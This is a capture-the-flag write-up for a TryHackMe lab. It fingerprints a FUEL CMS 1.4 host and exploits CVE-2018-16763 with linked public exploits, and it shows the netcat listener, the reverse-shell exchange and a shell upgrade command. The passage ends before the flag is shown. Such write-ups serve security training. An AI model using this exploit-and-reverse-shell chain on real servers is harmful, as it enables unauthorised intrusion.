TryHackMe - Vulnerability Capstone
Just fix your exploits
Introduction
A bit of a frustrating room, because we had to go through multiple non-working exploits, but we managed to find a working one in the end.
Questions
What is the name of the application running on the vulnerable machine?
nmap -T4 -n -sC -sV -Pn -p- 10.10.159.5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9a:5b:14:49:04:b1:d5:44:82:6b:85:b0:f1:b8:1f:69 (RSA)
| 256 6f:4f:08:60:6d:46:a7:b8:e3:0e:1b:00:12:4b:e3:09 (ECDSA)
|_ 256 49:3c:2d:13:e7:8b:77:70:47:e4:f4:e1:df:96:5d:7a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Open ports:
22/tcp
80/tcp
Answer:
Fuel CMS
What is the version number of this application?
Answer:
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
A quick Google search turns up the following: https://pentest-tools.com/vulnerabilities-exploits/fuel-cms-141-remote-code-execution_2612
CVE-2018-16763 is a pre-authentication PHP code evaluation bug in FUEL CMS 1.4.1, reachable through the filter parameter of /fuel/pages/select/ (the /fuel/ path is exactly what robots.txt was hiding in the nmap output above).
Answer:
CVE-2018-16763
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Let’s get into it.
Download the exploit from https://www.exploit-db.com/exploits/50477 and run it against the target:
python3 50477.py
usage: python3 50477.py -u <url>
python3 50477.py -u http://10.10.159.5
[+]Connecting...
Enter Command $ls
system
Enter Command $id
system
Enter Command $whoami
system
No matter what we type, the response is the same.
OK, let's try https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE, which targets the same CVE with a different approach:
git clone https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE
This doesn't seem to work well either…
Flag
OK, finally an exploit that works: https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py
$ python3 exploit.py 10.10.159.5/
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
Created by Ac1d
Menu
exit - Exit app
shell_me - Get a reverse shell (netcat)
help - Show this help
fuelCMS$
We start our netcat listener on our attacking machine:
nc -lvnp 1337
And have the exploit send a shell back to us:
fuelCMS$ shell_me
Enter your attacking machine IP:PORT $ 10.14.99.72:1337
And we receive our shell:
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.14.99.72] from (UNKNOWN) [10.10.159.5] 44904
/bin/sh: 0: can't access tty; job control turned off
$ ls
README.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt
$ whoami
www-data
Upgrade to an interactive shell and grab the flag from /home/ubuntu:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'